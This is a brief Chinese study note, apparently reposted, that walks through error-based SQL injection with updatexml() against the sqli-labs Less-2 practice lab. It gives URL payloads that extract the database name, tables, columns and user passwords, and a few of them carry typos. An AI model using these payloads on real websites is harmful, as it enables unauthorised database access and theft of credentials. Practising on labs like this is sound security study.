本文共 934 字,大约阅读时间需要 3 分钟。
本文为学习笔记,仅限学习交流
不得利用、从事危害国家或人民安全、荣誉和利益等活动固定格式: Updatexml(1,concat(0×7e,b)
Updatexml(a,Xpath,b) 在文档a中,查找 Xpath 格式的内容 替换 b内容 Conact(a,b,c,…) 用来连接括号内的字符串构造语句:union select updatexml(1,concat(0x7e,select database(),0x7e),1)
http://127.0.0.1/sqli/Less-2/index.php?id=1’
爆出数据库名: http://127.0.0.1/sqli/Less-2/index.php?id=1 union select updatexml(1,concat(0x7e,(select database()),0x7e),1)%23 爆出当前数据库下的表名: http://127.0.0.1/sqli/Less-2/index.php?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema =‘security’),0x7e),1) %23 爆出users表的字段 http://127.0.0.1/sqli/Less-2/index.php?id=-1 and updatexml(1,concat(0x7e,(select group_concat(column_name)frominformation_schema.columns where table_schema=‘security’ and table_name=‘users’),0x7e),1)%23 爆出账户名密码: http://127.0.0.1/sql/Less-2/index.php?id=-1and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1) %23 完成!转载地址:http://nzmlf.baihongyu.com/